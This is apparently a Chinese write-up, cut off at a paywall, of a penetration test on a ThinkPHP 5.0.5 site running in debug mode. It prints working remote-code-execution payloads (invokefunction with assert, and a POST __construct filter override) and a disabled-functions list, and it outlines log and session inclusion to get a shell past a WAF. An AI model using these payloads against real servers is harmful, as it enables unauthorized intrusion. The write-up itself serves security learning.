本文详细介绍了进行网络安全测试的过程,通过简单的信息收集,发现目标系统为5.0.5版本并开启了debug。利用PHP的assert功能尝试代码执行,但由于禁用函数无法直接执行命令。随后,通过日志包含和Session包含来尝试获取shell。经过对日志路径的查找和payload的加密处理,最终成功绕过拦截,实现代码执行。
一、简单的信息收集
尝试路径报错,获取目标版本和配置信息。
https://example.com/admin/indeeex/login.html
版本为5.0.5,开启debug。
直接执行payload,宝塔拦截
/index.php?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=a
ssert&vars[1][]=phpinfo()
【网络安全 全套学习资料·攻略】文字末尾了解详细
尝试post执行paylaod
_method=__construct&method=get&filter=call_user_func&get[]=phpinfo
成功执行,php5的assert默认存在代码执行,php7默认不存在。
禁用函数
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_ws
最低0.47元/天 解锁文章
2462
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
